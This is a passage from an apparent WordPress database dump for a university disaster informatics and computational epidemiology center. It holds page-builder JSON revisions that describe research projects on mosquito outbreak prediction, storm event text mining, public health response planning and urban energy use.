3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-22 11:00:11','2022-04-22 15:00:11','',438,'https://gsudice.dataconn.net/?p=1197',0,'revision','',0),(1204,1,'2022-04-22 11:16:53','2022-04-22 15:16:53','','Opherus','','inherit','open','closed','','opherus','','','2022-04-22 11:16:53','2022-04-22 15:16:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Opherus.png',0,'attachment','image/png',0),(1205,1,'2022-04-22 11:17:07','2022-04-22 15:17:07','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png','cropped-Opherus.png','','inherit','open','closed','','cropped-opherus-png','','','2022-04-22 11:17:07','2022-04-22 15:17:07','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png',0,'attachment','image/png',0),(1207,1,'2022-04-22 11:17:17','2022-04-22 15:17:17','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-22 11:17:17','2022-04-22 15:17:17','',438,'https://gsudice.dataconn.net/?p=1207',0,'revision','',0),(1221,1,'2022-04-29 00:53:21','2022-04-29 04:53:21','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg','headshot-1.jpg','','inherit','open','closed','','cropped-cropped-cropped-headshot-1-jpg','','','2023-10-03 15:57:57','2023-10-03 19:57:57','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-headshot-1.jpg',0,'attachment','image/jpeg',0),(1224,1,'2022-04-29 01:20:54','2022-04-29 05:20:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>-----Director\'s Statement -----<\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','publish','closed','closed','','1224','','','2022-04-29 08:48:47','2022-04-29 12:48:47','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=1224',0,'extb_post_json','',0),(1231,1,'2022-04-29 01:21:12','2022-04-29 05:21:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c62\",\"parentId\":\"453-c61\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c64\",\"parentId\":\"453-c63\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c64\",\"index\":0,\"id\":\"453-c65\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\"}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c66\",\"parentId\":\"453-c63\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c66\",\"index\":0,\"id\":\"453-c67\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c66\",\"index\":1,\"id\":\"453-c68\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c62\",\"index\":0,\"id\":\"453-c63\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c61\",\"parentId\":\"453-c60\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c60\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c38\",\"parentId\":\"453-c37\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c38\",\"index\":0,\"id\":\"453-c39\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c38\",\"index\":1,\"id\":\"453-c40\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement 